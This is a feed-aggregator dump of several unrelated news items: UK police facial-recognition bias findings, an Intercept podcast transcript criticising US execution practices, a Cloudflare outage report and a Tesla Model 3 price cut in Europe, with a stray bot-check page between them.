Following the latest testing conducted by the National Physical Laboratory (NPL) of the technology’s application within the police national database, the Home Office said it was “more likely to incorrectly include some demographic groups in its search results”.
Police and crime commissioners said publication of the NPL’s finding “sheds light on a concerning inbuilt bias” and urged caution over plans for a national expansion.
The findings were released on Thursday, hours after Sarah Jones, the policing minister, had described the technology as the “biggest breakthrough since DNA matching”.
Facial recognition technology scans people’s faces and then cross-references the images against watchlists of known or wanted criminals. It can be used while examining live footage of people passing cameras, comparing their faces with those on wanted lists, or be used by officers to target individuals as they walk by mounted cameras.
Images of suspects can also be run retrospectively through police, passport or immigration databases to identify them and check their backgrounds.
Analysts who examined the police national database’s retrospective facial recognition technology tool at a lower setting found that “the false positive identification rate (FPIR) for white subjects (0.04%) is lower than that for Asian subjects (4.0%) and black subjects (5.5%)”.
The testing went on to find that the number of false positives for black women was particularly high. “The FPIR for black male subjects (0.4%) is lower than that for black female subjects (9.9%),” the report said.
The Association of Police and Crime Commissioners said in a statement that the findings showed an inbuilt bias. It said: “This has meant that in some circumstances it is more likely to incorrectly match black and Asian people than their white counterparts. The language is technical but behind the detail it seems clear that technology has been deployed into operational policing without adequate safeguards in place.”
The statement, signed off by the APCC leads Darryl Preston, Alison Lowe, John Tizard and Chris Nelson, questioned why the findings had not been released at an earlier opportunity or shared with black and Asian communities.
It said: “Although there is no evidence of adverse impact in any individual case, that is more by luck than design. System failures have been known for some time, yet these were not shared with those communities affected, nor with leading sector stakeholders.”
The government announced a 10-week public consultation that it hopes will pave the way for the technology to be used more often. The public will be asked whether police should be able to go beyond their records to access other databases, including passport and driving licence images, to track down criminals.
Civil servants are working with police to establish a new national facial recognition system that will hold millions of images.
Charlie Whelton, a policy and campaigns officer for the campaign group Liberty, said: “The racial bias in these stats shows the damaging real-life impacts of letting police use facial recognition without proper safeguards in place. With thousands of searches a month using this discriminatory algorithm, there are now serious questions to be answered over just how many people of colour were falsely identified, and what consequences this had.
“This report is yet more evidence that this powerful and opaque technology cannot be used without robust safeguards in place to protect us all, including real transparency and meaningful oversight. The government must halt the rapid rollout of facial recognition technology until these are in place to protect each of us and prioritise our rights – something we know the public wants.”
The former cabinet minister David Davis raised concerns after police leaders said the cameras could be placed at shopping centres, stadiums and transport hubs to hunt for wanted criminals. He
told the Daily Mail
: “Welcome to big brother Britain. It is clear the government intends to roll out this dystopian technology across the country. Something of this magnitude should not happen without full and detailed debate in the House of Commons.”
Officials say the technology is needed to help catch serious offenders. They say there are manual safeguards, written into police training, operational practice and guidance, that require all potential matches returned from the police national database to be visually assessed by a trained user and investigating officer.
A Home Office spokesperson said: “The Home Office takes the findings of the report seriously and we have already taken action. A new algorithm has been independently tested and procured, which has no statistically significant bias. It will be tested early next year and will be subject to evaluation.
“Given the importance of this issue, we have also asked the police inspectorate, alongside the forensic science regulator, to review law enforcement’s use of facial recognition. They will assess the effectiveness of the mitigations, which the National Police Chiefs’ Council supports.”
We've detected unusual activity from your computer network
To continue, please click the box below to let us know you're not a robot.
Why did this happen?
Please make sure your browser supports JavaScript and cookies and that you are not
blocking them from loading.
For more information you can review our
Terms of Service
and
Cookie Policy
.
Need Help?
For inquiries related to this message please
contact
our support team
and provide the reference ID below.
Lethal Illusion: Understanding the Death Penalty Apparatus
Intercept
theintercept.com
2025-12-05 11:00:00
Malcolm Gladwell and Liliana Segura unpack how the death penalty is administered in America.
The post Lethal Illusion: Understanding the Death Penalty Apparatus appeared first on The Intercept....
As of December 1,
officials across the U.S. have executed 44 people in 11 states, making 2025 one of the deadliest years for state-sanctioned executions in recent history. According to the Death Penalty Information Center,
three more people
are scheduled for execution before the new year.
The justification for the death penalty is that it’s supposed to be the ultimate punishment for the worst crimes. But in reality, who gets sentenced to die depends on things that often have nothing to do with guilt or innocence.
Historically, judges have disproportionately sentenced Black and Latino people to death. A new
report
from the American Civil Liberties Union released in November found that more than half of the 200 people exonerated from death row since 1973 were Black.
Executions had been on a
steady decline since their peak in the late 1990s
. But the numbers slowly started to
creep back up
in recent years, more than doubling from 11 in 2021 to 25 last year, and we’ve almost doubled that again this year. Several states have stood out in their efforts to ramp up executions and conduct them at a faster pace — including
Alabama
.
Malcolm Gladwell’s new podcast series “
The Alabama Murders
” dives into one case to understand what the system really looks like and how it operates. Death by lethal injection involves a three-drug protocol: a sedative, a paralytic, and, lastly, potassium chloride, which is supposed to stop the heart. Gladwell explains to Intercept Briefing host Akela Lacy how it was developed, “It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something ‘more humane.’ And their model was why don’t we do for humans what we do with horses?”
Liliana Segura
, an Intercept senior reporter who has covered
capital punishment
and criminal justice for
two decades
,
adds that the protocol is focused on appearances. “It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts and made to look, using the tools of medicine to kill … like this has really been thought through.” She says, “These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science.”
Listen to the full conversation of The Intercept Briefing on
Apple Podcasts
,
Spotify
, or wherever you listen.
Transcript
Akela Lacy:
Malcolm and Liliana, welcome to the show.
Malcolm Gladwell:
Thank you.
Liliana Segura:
Thank you.
AL:
Malcolm, the series starts by recounting the killing of Elizabeth Sennett, but very quickly delves into what happens to the two men convicted of killing her, John Parker and Kenny Smith. You spend a lot of time in this series explaining, sometimes in graphic detail, how the cruelty of the death penalty isn’t only about the execution, but also about the system around it — the paperwork, the waiting. This is not the kind of subject matter that you typically tackle. What drew you to wanting to report on the death penalty and criminal justice?
MG:
I wasn’t initially intending to do a story about the death penalty. I, on a kind of whim, spent a lot of time with Kate Porterfield, who’s the psychologist who studies trauma, who shows up halfway through “The Alabama Murders.”
I was just interviewing her about, because I was interested in the treatment of traumatized people, and she just happened to mention that she’d been involved with the death penalty case — and her description of it was so moving and compelling that I realized, oh, that’s the story I want to tell. But this did not start as a death penalty project. It started as an exploration of a psychologist’s work, and it kind of took a detour.
AL:
Tell us a little bit more about how the bureaucracy around the death penalty masks its inherent cruelty.
MG:
There’s a wonderful phrase that one of the people we interviewed, Joel Zivot, uses. He talks about how the death penalty — he was talking about lethal injection, but this is also true of nitrogen gas — he said it is the impersonation of a medical act. And I think that phrase speaks volumes, that a lot of what is going on here is a kind of performance that is for the benefit of the viewer. It has to look acceptable to those who are watching, to those who are in society who are judging or observing the process.
“They’re interested in the impersonation of a medical act, not the implementation of a medical act.”
It is the management of perception that is compelling and driving the behavior here — not the actual treatment of the condemned prisoner him/herself. And once you understand that, oh, it’s a performance, then a lot of it makes sense.
One of the crucial moments in the story we tell is, where there is a hearing in which the attorneys for Kenny Smith are trying to get a stay of execution, and they start asking the state of Alabama, the corrections people in the state of Alabama to explain, did they understand what they would do? They were contemplating the use of nitrogen gas. Did they ever talk to a doctor about the risks associated with it? Did they ever contemplate
any of the potential side effects
? And it turns out they had done none of that. And it makes sense when you realize that’s not what they’re interested in.
They’re interested in the impersonation of a medical act, not the implementation of a medical act. The bureaucracy is there to make it look good, and that was one of the compelling lessons of the piece.
AL:
And it’s impersonating a medical act with people who are not doctors, right? Like people who are not, do not have this training.
MG:
In that hearing, there’s this real incredible moment where one of the attorneys asks the man who heads Alabama’s Department of Corrections, did you ever consult with any medical personnel about the choice of execution method and its possible problems? And the guy says no.
You just realize, they’re just mailing it in. Like they have no — the state of Alabama is not interested in exploring the kind of full implications of what they’re doing. They’re just engaged in this kind of incredibly slapdash operation.
“It has to look acceptable to those who are watching, to those who are in society who are judging or observing the process.”
AL:
Liliana, I wanna bring you in here. You’ve spent years reporting on capital punishment in the U.S. and looked into many cases in different states. Why are states like Florida and Alabama ramping up the number of executions? Is it all politics? What’s going on there?
LS:
That is one of the questions that I think a lot of us who cover this stuff have been asking ourselves all year long. And to some degree, it’s always politics. The story of the death penalty, the story of executions, so often really boils down to that.
We are in a political moment right now where the
climate around executions
, certainly, but I think in general, the kind of appetite for or promotion of vengeance and brutality toward our enemies is really shockingly real right now. And I was reluctant about a year ago to really
trace our current moment to Trump
. The death penalty has been a
bipartisan project
; I don’t want to pretend like this is something that begins and ends with somebody like Trump.
That said, it’s really shocking to see the number of executions that are being pushed through, especially in Florida. And this is something that has been ramped up by Gov. DeSantis for purely political reasons. This
death penalty push in Florida
began with his political ambitions when he was originally going to run for president. And I think that to some degree is a story behind a lot of death penalty policy, certainly going back decades, and certainly speaks to the moment we’re in.
I did want to just also touch on some of what Malcolm was talking about when it comes to the performance of executions themselves. Over the past many years, I’ve reported on litigation, death penalty trials, that have taken place in states like Oklahoma and here in Tennessee where I live, where we restarted executions some years ago after a long time of not carrying any out. And these trials had, at the center, the three-drug protocol that is described so thoroughly in the podcast.
It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts and made to look — using the tools of medicine to kill — and made to look like this has really been thought through. But when you really trace that history — as you do, Malcolm, in your podcast — there’s no there there.
These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science. There was no way to test these methods. Nobody can tell us, as you described in your podcast, what it feels like to undergo this execution process. And I think it’s really important to remember that this is not only the story of lethal injection, this is the story of executions writ large.
When the electric chair came on the scene generations ago, it was also touted as the height of technology because it was using electricity and it was supposed to be more humane than hanging. There had been botched hangings that were seen as gruesome ordeals. So there’s this bizarre way in which history repeats itself when it comes to these methods that are promoted as the height of modernity and humanity —and it’s just completely bankrupt and false.
AL:
Malcolm, do you want to add something?
MG:
Yeah, we have a big focus in the case I’m describing, Kenny Smith, was notorious because he had a botched execution where they couldn’t find a vein. And one of the points that Joel Zivot makes is that, of course, it’s not surprising that they, in that case and in many others, they can’t find a vein because that is a medical procedure that is designed to be undertaken in a hospital setting by trained personnel
with
the cooperation of the patient. Usually we’d find a vein, and the patient cooperates because we’re trying to save their life or make them healthier. This is a use of this procedure that is completely different. It is outside of a medical institution, not being done by people who are experienced medical professionals, and is not being done with the cooperation of the patient. The patient in this case is a condemned prisoner who is not in the same situation as someone who’s ill and trying to get better.
AL:
I want to just walk our listeners through this. So this is, again, one of the pieces of the series, this three-drug protocol. First there’s a sedative, then there’s a paralytic, and then there’s finally potassium chloride, which is supposed to stop the heart. How did that protocol come to be developed?
MG:
It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something “more humane.”
And their model was, well, why don’t we do for humans what we do with horses? Which was a suggestion that had come from Ronald Reagan, then governor of California. So they just generally thought, well, we can do a version of what we do in those instances, only we’ll just ramp up the dose. This is also a kind of anesthesia sometimes.
AL:
This is advertised as something that is supposed to be painless.
MG:
And these drugs were also in use in the medical setting, but their idea was, we’ll take a protocol that is loosely based on what is used in a medical setting and ramp up the doses so that instead of merely sedating somebody, we’re killing them.
“ It wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys.”
And it wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys, dreaming up something on the back of an envelope. And one of the guys, the medical examiner, later regretted his part in the whole procedure, but the genie was out of the bottle. And everybody jumped on this as an advance over the previous iteration of killing technology.
AL:
In addition to being advertised as painless, it’s also supposed to be within the bounds of the Eighth Amendment protection against cruel and unusual punishment. Can you tell us about that?
MG:
In order to satisfy that prohibition against cruel and unusual punishment, you have to have some insight as to what the condemned prisoner is going through when they are being subjected to this protocol. The universe of people engaged in the capital punishment project were universally indifferent to trying to find out how exactly this worked. They weren’t curious at all to figure out, for example, was there any suffering that was associated with this three-drug protocol, or which of the three drugs is killing you? Or, I could go on and on and on.
They just implemented it and because it looked good from the outside, because you have given someone a sedative and a paralytic, it’s impossible to tell from the outside whether they’re going through any kind of suffering. It was just assumed that there should be no, there must be no suffering going on the inside.
And the Eighth Amendment does not say that people should not be subjected to the appearance of cruel and unusual punishment. It says, no, the actual punishment itself for the individual should not be cruel and unusual. So there was, at no point could anyone, in the early history of this, did anyone truly satisfy the intent of the Eighth Amendment.
AL:
Liliana, you’ve written a lot about this protocol as well, and the Supreme Court
has taken a stance on it
. Tell us about that.
LS:
So one thing that’s really important to understand about the Eighth Amendment and the death penalty in this country is that the U.S. Supreme Court has weighed in on the death penalty numerous times, but has never invalidated a method of execution as violating the Eighth Amendment ban on cruel and unusual punishment. And that fact right there I think speaks volumes.
But one of the cases that I go back to over and over again in my work about lethal injection and about other execution methods, dates back to the 1940s, and it’s a case involving a man named Willie Francis, who was a teenager, a Black teenager who had been condemned to die in Louisiana. They sent him to the electric chair in 1946, and he survived. He survived their initial attempts to execute him. It’s a grotesque ordeal, there’s been a lot written historically about this.
That case, they stopped the execution. He
appealed to the U.S. Supreme Court
, and a majority of justices found that attempting to kill him again, wouldn’t violate the Eighth Amendment, and they sent him back in 1947, they succeeded in killing him. But the language that comes out of the court in this case really goes a long way to helping us understand how we ended up where we are now. They essentially said, “Accidents happen. Accidents happen for which no man is to blame.” And there’s another turn of phrase that’s really galling in which essentially they call this ordeal that he suffered “
an innocent misadventure
.” And this language, this idea that this was an innocent misadventure finds its way into subsequent rulings decades later.
So in 2008, I believe it was, the U.S. Supreme Court took up the three-drug protocol, which at the time was being used by Kentucky. This was a case called
Baze v. Rees
. There was a lot of evidence, there was a lot that the justices had to look at that should have given them pause about the fact that this protocol was not rooted in science. That there had been many botched executions — in terms of the inability to find a vein, in terms of evidence that people were suffering on the gurney.
The U.S. Supreme Court upheld that protocol, and yet right around the time that they handed down that ruling, states began tinkering with the lethal injection protocol that had been the prevailing method for so long.
Without getting too deep in the weeds, the initial drug — the drug that was supposed to anesthetize people who were being killed by lethal injection — had been originally a drug called
sodium thiopental
, which was thought to be, believed to be, for good reasons something that could basically put a person under, where they wouldn’t necessarily feel the noxious effects of the subsequent drugs.
States were unable to get their hands on this drug for a number of reasons, and subsequently began swapping out other drugs to replace that drug. And different states tried different things. A number of states eventually settled on this drug called
midazolam
, which is a sedative, which does not have the same properties as the previous drug — and over and over again, experts have said that this is not a drug that’s going to be effective in providing and anesthetizing people for the purpose of lethal injection.
The Supreme Court once again ruled that this was true. In Oklahoma, this was the case Glossip v. Gross, which the Supreme Court heard after there had been a very high profile really gruesome, botched execution, a man named
Clayton Lockett
who was executed in 2014. This ended up going up to the Supreme Court. And I
covered that oral argument
and what was really astonishing about that oral argument wasn’t just how grotesque it all was, but the fact that the justices were very clearly, very annoyed, very cranky about the fact that, only a few years after having upheld this three-drug protocol, now they’re having to deal with this thing again. And again, they upheld this protocol, despite a lot of evidence that this was completely inhumane, that there was a lot of reason to be concerned that people were suffering on the gurney, while being put to death by lethal injection.
And so the reason I go back to the Willie Francis case is that it really tells us everything that we need to know. Which is that if you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country. And so the Supreme Court has weighed in not only on the three-drug protocol, but on execution methods in general. And they have always found that there’s not really a problem here.
“If you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country.’
MG:
At a certain point, it becomes obvious that the cruelty is the point. The Eighth Amendment does not actually have any kind of impact on their thinking because they are anxious to preserve the very thing about capital punishment that is so morally noxious, which is that it’s cruel.
AL:
Malcolm, one interesting thing that you talk about in this series is this concept of judicial override in Alabama, where a judge was able to impose a death sentence even if the jury recommended life in prison. This went on until 2017. As we know, death penalty cases can take decades, so it’s possible that there are still people on death row who have been impacted by judicial override. What’s your sense about how judges who went that route justified their decisions, if at all?
MG:
So Alabama was one of a small number of states who, in response to the Supreme Court’s hesitancy about capital punishment in the 1970s, instituted rules which said that a judge can override a jury’s sentencing determination in a capital case.
So if a jury says, “We want life imprisonment without parole,” the judge could impose a death penalty or vice versa. The motivation for these series of override laws — and there are only about three or four states in Florida, Alabama, a couple of others had them — is murky. But I suspect what they wanted to do was to guard against the possibility that juries would become overwhelmingly lenient.
The concern was that if the public sentiment was moving away from death penalty to the extent that it would be difficult to impose a death penalty in capital cases, unless you allowed judges to independently assert their opinion when it came to sentencing. And I also suspect that there’s, in states like Alabama, there was a little bit of a racial motivation that they thought that Black juries would be unlikely to vote for the death penalty for Black defendants, and they wanted to reserve the right to act in those cases.
And what happens in Alabama is that other states gradually abandon this policy, but Alabama sticks to it — not only that, they have the most extreme version of it. They basically allow the judge to overrule under any circumstances without giving an explanation for why.
And when they finally get rid of this, they don’t make it retroactive. So they only say, “Going forward, we’re not going to do override. But we’re not going to spare people who are on death row now because of override — we’re not going to spare their lives.” And so it raises this question about, the reason we call our series “The Alabama Murders” is that when you look very closely at the case we’re interested in, you quickly come to the conclusion there’s something particularly barbaric about the political culture of Alabama. Not news, by the way, for anyone who knows anything about Alabama. But Alabama, it’s its own thing, and they remain to this day clinging to this notion that they need every possible defense against the possibility that a convicted murderer could escape with his life.
AL:
Speaking of this idea of the title of the show, I also want to bring up that I did not know that the autopsy in an execution, and I don’t know that this is unique to Alabama, but that it marks the death as a homicide. I was actually shocked to hear that.
MG:
Yeah, isn’t that interesting? That is the one moment of honesty and self-awareness in this entire process.
AL:
Right, that’s why it’s shocking. It’s not shocking because we know it’s a homicide. It’s shocking because they’re admitting to it in a record that is accessible to the public at some point.
[Break]
AL:
Malcolm, you mentioned the racial dynamic with Alabama in particular, but Liliana, I want to ask if you could maybe speak to the historic link between the development of the death penalty and the history of lynching in the South.
LS:
So it’s really interesting. Alabama is, in many ways, the poster child for this line that can be drawn between not only lynching, but slavery to lynching, to Reconstruction, to state-sanctioned murder. And that’s an uneasy line to draw in the sense of — there’s a reason that Bryan Stevenson, who is the head of the Equal Justice Initiative, has called the death penalty the “stepchild of lynching.”
He calls it
the stepchild of lynching
and it’s because, there’s something of an indirect link, but it’s an absolutely — that link is real. And you really see it in Alabama and certainly in the South. I think it was in 2018, I went down to Montgomery a number of times for the opening of EJI’s lynching memorial that they had launched there and this was a major event. At the time I went with this link in mind to try to interrogate and understand this history a little bit better. And I ended up writing this big long piece, which I only recently went back to reread because it’s not fresh in my mind anymore.
But one of the things that is absolutely, undoubtedly true is that the death penalty in the South in its early days was justified using the exact same rationale that people used for lynching, which was that this was about protecting white women from sexually predatory Black men.
“The death penalty in the South in its early days was justified using the exact same rationale that people used for lynching.”
And that line, that consistent feature of executions — whether it was an extrajudicial lynching or an execution carried out by the state — has been really consistent and I think overlooked in the history of the death penalty. And part of the reason it’s overlooked is that, again, going back to the Supreme Court, there have been a number of times that this history has come before the Supreme Court and other courts, and by and large, the reaction has been to look away, to deny this.
That is absolutely true in the years leading up to the 1972 case,
Furman v. Georgia
, which Malcolm alluded to earlier, there was this moment where the Supreme Court had to pause executions. And this was a four-year period in the ’70s. 1972 was Furman v. Georgia. 1976 was Gregg v. Georgia. Part of the reason that Furman, which was this 1972 case, invalidated the death penalty across the country, was because there was evidence that executions, that death sentences were being handed down in what they called an arbitrary way.
And in reality, it wasn’t so much arbitrariness, as very clear evidence of sentences that were being given disproportionately to people of color, to Black people, and history showed that that was largely motivated by cases in which a victim was white. It was a white woman maybe who had been subjected to sexual violence. There is that link, and I think it’s really important to remember that.
In Alabama, one of the really interesting things too, going back to judicial override, there’s this kind of irony in the history of judicial override in the way that it was carried out by judges. Alabama, when they restarted the death penalty in the early ’80s, was getting a lot of flack for essentially having a racist death penalty system. Of course, there was a lot of defensiveness around this, and there were judges who, actually, in cases where juries did not come back with a death sentence for a white defendant, there were cases where judges then overrode that decision in a sort of display of fairness.
One of the things that I found when I was researching
my piece from 2018
was that there was a judge in, I believe it was 1999, who explained why he overrode the jury in sentencing this particular white man to die. And he said, “If I had not imposed the death sentence, I would’ve sentenced three Black people to death and no white people.” So this was his way of ensuring fairness. “Well, I’ve gotta override it here,” never mind what it might say about the jury in the decision not to hand down a death sentence for a white person.
“They needed the appearance of fairness.”
Again, it goes back to appearance. They needed the appearance of fairness. And so Alabama really does typify a certain kind of racial dynamic and early history of the death penalty that you see throughout the South, not just the South, but especially in the South.
AL:
One of the things proponents of the death penalty are adamant about is that it requires some element of secrecy to survive.
Executions happen behind closed walls, in small rooms, late at night. The people involved never have their identities publicly revealed or their credentials. The concern being that if people really knew what was involved, there would be a massive public outcry. Malcolm, in this series you describe in gruesome detail what is actually involved in an execution. For folks who haven’t heard the series, tell us about that.
MG:
In Alabama, there is a long execution protocol. A written script, which was made public only because it came out during a lawsuit, which kind of lays out all the steps that the state takes. And Alabama also has, to your point, an unusual level of secrecy.
For example, in many states, the entire execution process is open, at least to witnesses. In Alabama, you only see the person after they’ve found a vein. So the Kenny Smith case, we were talking about where they spent
hours unsuccessfully trying to find a vein
— that was all done behind closed doors.
And the second thing that you pointed out is the people who are involved remain anonymous, and you can understand why. It is an acknowledgment on the part of these states that they are engaged in something shameful. If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?
But instead, they go in the opposite direction and they try and shroud it. They make it as much of a mystery as they can. And it’s funny, so much of our knowledge about death penalty procedures only comes out because of lawsuits.
“If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?”
It is only under the compulsion of the judicial process that we learn even the smallest tidbit about what’s going on or what kind of thought went into a particular procedure. When we’re talking about the state taking the life of a citizen of the United States, that’s weird, right?
We have more transparency over the most prosaic aspects of government practice than we do about something that involves something as important as taking someone’s life.
AL:
Liliana, you’ve witnessed two executions. Tell us about your experience, and particularly this aspect of secrecy surrounding the process.
LS:
Let me just pick up first on the secrecy piece because one of the really bizarre aspects of the death penalty, when you’ve covered it in different states and looked at the federal system as well, is that there’s just this wide range when it comes to what states and jurisdictions are willing to reveal and show.
What they are not willing to reveal is certainly the individuals involved. A ton of states have or death penalty states have passed secrecy legislation essentially bringing all of that information even further behind closed doors. The identity of the executioners was always sort of a secret. But now we don’t get to know
where they get the drugs
, and in some states, in some places, the secrecy is really shocking. I just wrote a story about
Indiana, which recently restarted executions
. And Indiana is the only active death penalty state that does not allow any media witnesses. There is nothing, and that’s exceptional.
And if you go out and try as a journalist to cover an execution in Indiana, it’s not going to be like in Alabama or in Oklahoma, where the head of the DOC comes out and addresses things and says, whether true or not true, “Everything went great.” No, you are in a parking lot at midnight across from the prison. There is absolutely nobody coming to tell you what happened. It’s a ludicrous display of indifference and contempt, frankly, for the press or for the public that has a right and an interest in knowing what’s happening in their names. So secrecy — there’s a range, I guess is my point, and yes, most places err on the side of not revealing anything, but some take that a lot further than others.
In terms of the experience of witnessing an execution, that’s obviously a big question. I will say that both those executions were in Oklahoma. That is a state that has a really ugly sordid
history of botched executions
going back
longer than 10 years
.
But Oklahoma became infamous on the world stage about 10 years ago, a little more, for botching a series of executions. I’ve been
covering the case of Richard Glossip
for a while. Richard Glossip is a man with a long-standing innocence claim whose death sentence and conviction was
overturned
only this year. Richard Glossip was almost put to death by the state of Oklahoma in 2015, and I was outside the prison that day. And it’s only because
they had the wrong drug on hand
that it did not go through.
And so going into a situation where I was preparing to witness an execution in Oklahoma, I was all too keenly aware of the possibility that something could go wrong — and that’s just something you know when you’re covering this stuff. And instead, Oklahoma carried out the three-drug protocol execution of a man named
Anthony Sanchez
in September of 2023. I had written about Anthony’s case. I had spoken to him the day before and for the better part of a year. And I think I’m still trying to understand what I saw that day because, by all appearances, things looked like they went as smoothly as one would hope, right?
He was covered with a sheet. You saw the color in his face change. He went still. And as a journalist or just an ordinary person trying to describe what that meant, what I was seeing — I couldn’t really tell you, because the process by design was made to look that way, but I could not possibly guess as to what he was experiencing.
Again, that’s because lethal injection and that three-drug protocol has been designed to make it look humane and make it look like everything’s gone smoothly.
I will say one thing that has really stuck with me about that execution was that I was sitting right behind the attorney general of Oklahoma, Gentner Drummond, who has attended — I think to his credit, frankly — every execution that has been carried out in Oklahoma under his tenure. And he was sitting in front of me and a member of the one witness who was there, who, I believe, was a member of Anthony’s family was sitting one seat over. After the execution was over, she was quietly weeping, and Gentner Drummond, the attorney general who was responsible for this execution, put his hand on her and said, “I’m sorry for your loss.” And it was this really bizarre moment because he was acknowledging that this was a loss, that this death of this person that she clearly cared about — he was responsible for it.
And I don’t know that he has ever said something like that since, because a lot of us journalists in the room reported back. And it’s almost like, you’re not supposed to say that — there shouldn’t be sorrow here, really. This is justice. This is what’s being done in our name. And I’m still trying to figure out how I feel about that. Because by and large in the executions I’ve reported on, you don’t have the attorney general himself or the prosecutor who sent this person to death row attending the execution. It’s out of sight, out of mind.
AL:
Malcolm, as we’ve talked about and has been repeatedly documented, the way that the death penalty has been applied has been racist and classist, disproportionately affecting Black and Latino people and poor people. It has also historically penalized people who have mental health issues or
intellectual disabilities
. Even with all that evidence, why does this persist? How has vengeance become such a core part of the American justice system?
MG:
As I spoke before, I think what’s happened is that the people who are opposed to death penalty are having a different conversation than the people who are in favor of it.
The
people
who are
in favor
are trying to make a kind of moral statement about society’s ultimate intolerance of people who violate certain kinds of norms, and they are in the pursuit of that kind of moral statement, willing to go to almost any lengths. And on the other side are people who are saying that going this far is outside of the moral boundaries of a civilized state.
Those are two very different claims that proceed on very different assumptions. And we’re talking past each other. It doesn’t matter to those who are making a broad moral statement about society’s intolerance what this condition, status, background, makeup of the convicted criminal is — because they’re not basing their decision on the humanity of the defendant, the criminal defendant. They’re making a broad moral point.
“I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem.”
I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem. That if opponents make it all about the individual circumstances of the defendant, the details of the case, was the person guilty or not, was the kind of punishment cruel and unusual — we’re kind of buying into the moral error here.
Because we’re opening the possibility that if all we were doing was executing people who were 100% guilty and if our method of execution was proven without a shadow of a doubt to be “humane,” then we don’t have a case anymore.
AL:
Right, then it’d be fine.
MG:
So I look at what I’ve done — that’s my one reservation about spending all this time on the Kenny Smith case, is that we shouldn’t have to do this. It should be enough to say that even the worst person in the world does not deserve to be murdered by a state.
That’s not what states do, right, in a civilized society. That one sentence ought to be enough. And it’s a symptom of how distorted this argument has become — that it’s not enough.
AL:
Liliana, I want to briefly get your thoughts on this too.
LS:
I think that people who are opposed to death penalty and abolitionists oftentimes say, “This is a broken system.” And we talk about prisons in that way; “this is a broken system.”
I think it’s a mistake to say that this is a broken system because I don’t think that this system, at its best, as you’ve just discussed, would be fine if it only worked correctly. I think that that’s absolutely not the case. So I do agree that, this system — I don’t hide the fact that I’m very opposed to the death penalty. I don’t think that you can design it and improve it and make it fair and make it just.
“I don’t think that you can design it and improve it and make it fair and make it just.”
I also think that part of the reason that people have a hard time saying that is: If you were to say that about the death penalty in this country, for all of the reasons that may be true, then you would be
forced to deal with the criminal justice system more broadly
, and with prisons and sentencing as a whole. And I think that there’s a real reluctance to see the problems that we see in death penalty cases in that broader context, because what does that mean for this country, if you’re calling into question on mass incarceration and in the purpose that these sentences serve.?
AL:
We’ve covered a lot here. I want to thank you both for joining me on the Intercept Briefing.
MG:
Thank you so much.
LS:
Thank you.
Another Cloudflare outage takes down websites including LinkedIn and Zoom
Guardian
www.theguardian.com
2025-12-05 10:58:47
Web infrastructure provider says it has implemented a fix after users had seen ‘a large number of empty pages’ A host of websites including LinkedIn, Zoom and Downdetector went offline on Friday morning after fresh problems at Cloudflare. Cloudflare said shortly after 9am UK time that it was “invest...
A host of websites including
LinkedIn
, Zoom and Downdetector went offline on Friday morning after fresh problems at Cloudflare.
Cloudflare said shortly after 9am UK time that it was “investigating issues with Cloudflare Dashboard and related APIs”, referring to application programming interfaces.
The internet infrastructure provider said users had seen “a large number of empty pages” as a result. It added shortly after that it had implemented a potential fix and was monitoring the results.
A number of websites and platforms were down, including the Downdetector site used to monitor online service issues. Users reported problems with other websites including
Zoom
, LinkedIn, Shopify and Canva, although many are back online.
The Downdetector website recorded more than 4,500 reports related to Cloudflare after returning online.
The Indian-based stockbroker Groww said it was facing technical issues “due to a global outage at Cloudflare”. Its services have since been restored.
Cloudflare provides network and security services for many online businesses to help their websites and applications operate. It claims that about 20% of all websites use some form of its services.
It comes only three weeks after
previous problems at Cloudflare
hit the likes of X, ChatGPT, Spotify, and multiplayer games such as League of Legends.
Jake Moore, a global cybersecurity adviser at ESET, said: “If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable. The problems often lie with the fact we are using an old network to direct internet users around the world to websites, but it simply highlights there is one huge single point of failure in this legacy design.”
Tesla cuts Model 3 price in Europe as sales slide amid Musk backlash
Guardian
www.theguardian.com
2025-12-05 10:55:10
CEO Elon Musk says lower-cost electric car will reignite demand by appealing to broader range of buyers Tesla has launched the lower-priced version of its Model 3 car in Europe in a push to revive sales after a backlash against Elon Musk’s work with Donald Trump and weakening demand for electric veh...
Musk, the electric car maker’s chief executive, has argued that the cheaper option, launched in the US in October,
will reinvigorate demand
by appealing to a wider range of buyers.
The new Model 3 Standard is listed at €37,970 (£33,166) in Germany, 330,056 Norwegian kroner (£24,473) and 449,990 Swedish kronor (£35,859). The move follows the
launch of a lower-priced Model Y SUV
, Tesla’s bestselling model, in Europe and the US.
Tesla sales have
slumped across Europe
as the company faces increasingly tough competition from its Chinese rival BYD, which outsold the US electric vehicle maker across the region for the first time in spring.
Sales across the EU have also been hurt by a buyer backlash against Musk’s support for Trump’s election campaign and period working in the president’s administration.
In his role running the “department of government efficiency”, or Doge, the tech billionaire
led sweeping job cuts
, but
quit in May
and after falling out with Trump over the “big, beautiful” tax and spending bill.
New taxes on electric cars in last month’s budget could undermine UK demand, critics have said. UK electric car sales grew at their slowest rate in two years in November, at just 3.6%, according to figures from the Society of Motor Manufacturers and Traders (SMMT).
“[This] should be seen as a wake-up call that a sustained increase in demand for EVs cannot be taken for granted,” said Mike Hawes, the chief executive of the SMMT. “We should be taking every opportunity to encourage drivers to make the switch, not punishing them for doing so.”
The chancellor’s new pay-per-mile road tax on EVs will charge drivers 3p for every mile from April 2028, costing motorists about £250 a year on average.
What are you doing this weekend?
Lobsters
lobste.rs
2025-12-05 10:54:28
